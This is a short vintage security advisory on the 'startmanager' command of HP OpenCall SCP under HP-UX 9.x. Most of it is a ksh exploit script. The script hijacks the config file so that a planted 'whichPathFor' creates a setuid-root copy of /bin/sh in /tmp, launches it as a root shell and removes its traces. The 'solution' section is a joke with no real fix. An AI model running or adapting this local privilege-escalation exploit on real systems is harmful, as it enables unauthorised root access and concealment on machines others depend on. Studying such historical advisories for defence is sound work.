COMMAND

    startmanager

SYSTEMS AFFECTED

    HP 9000 series 800s (HP-UX 9.X release)

PROBLEM

    SoD people  (Scriptors of  Doom) and  their guest  Otto Sync  were
    playing with OpenCall  SCP and, as  expected, broke the  toy.  Toy
    is system affected and exploit is following.

    Many  of  the  SCP  utilities  call  a binary called whichPathFor.
    Obviously HP needs help  to handle their directory  structure, see
    below how we  modify the config  file to fool  them into executing
    our own version of whichPathFor.

        #!/bin/ksh
        if [[ -a /tmp/shell ]]
        then
          rm -f /tmp/shell
        fi
        HP=$HP_AIN_CONFIG_FILE
        echo "bins   = /tmp\n" > /tmp/config
        mkdir /tmp/SS7
        mkdir /tmp/SS7/bin
        echo "cp /bin/sh /tmp/shell ; chmod 4755 /tmp/shell ;
        /opt/HP-AIN/SS7/bin/whichPathFor $*" > /tmp/SS7/bin/whichPathFor
        chmod +x /tmp/SS7/bin/whichPathFor
        export HP_AIN_CONFIG_FILE=/tmp/config
        ST=$$
        startmanager > /dev/null &
        sleep 2
        kill `expr $ST + 5`
        export HP_AIN_CONFIG_FILE=$HP
        rm -rf /tmp/SS7
        rm -f /tmp/config
        echo "A root shell from the Alps ...\n"
        /tmp/shell

SOLUTION

    :-)  (it  means  that  I  will  only quote part of "SoD advisory")
    Locate the main power switch and press it. This will mess up  your
    filesystem, piss off your customers and interrupt every IN call in
    progress.